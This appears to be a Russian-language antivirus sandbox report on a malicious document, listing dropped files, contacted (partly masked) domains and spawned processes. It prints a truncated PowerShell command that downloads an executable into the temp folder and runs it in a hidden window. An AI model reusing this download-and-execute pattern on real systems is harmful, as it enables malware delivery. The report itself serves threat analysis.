Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $mmozyywr как %temp%\swtdxdzt.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function mzmydzaf5([String] $Mmozyywr){(New-Object System.Net.WebClient).DownloadFile($Mmozyywr,''%TMP%\swtdxdzt.exe'');Start-Process ''%TMP%\swtdxdzt.exe'';}try{mz...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1884
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\gbwgfn.bat
- %TEMP%\1016081.cvr
Сетевая активность
Подключается к
- 'ev##ts4u.cz':80
TCP
Запросы HTTP GET
- http://www.ev##ts4u.cz/ser925.png
UDP
- DNS ASK ev##ts4u.cz
- DNS ASK tr#####ha-dinnie.co.uk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function mzmydzaf5([String] $Mmozyywr){(New-Object System.Net.WebClient).DownloadFile($Mmozyywr,''%TMP%\swtdxdzt.exe'');Start-Process ''%TMP%\swtdxdzt.exe'';}try{mz...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\gbwgfn.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\gbwgfn.bat" "
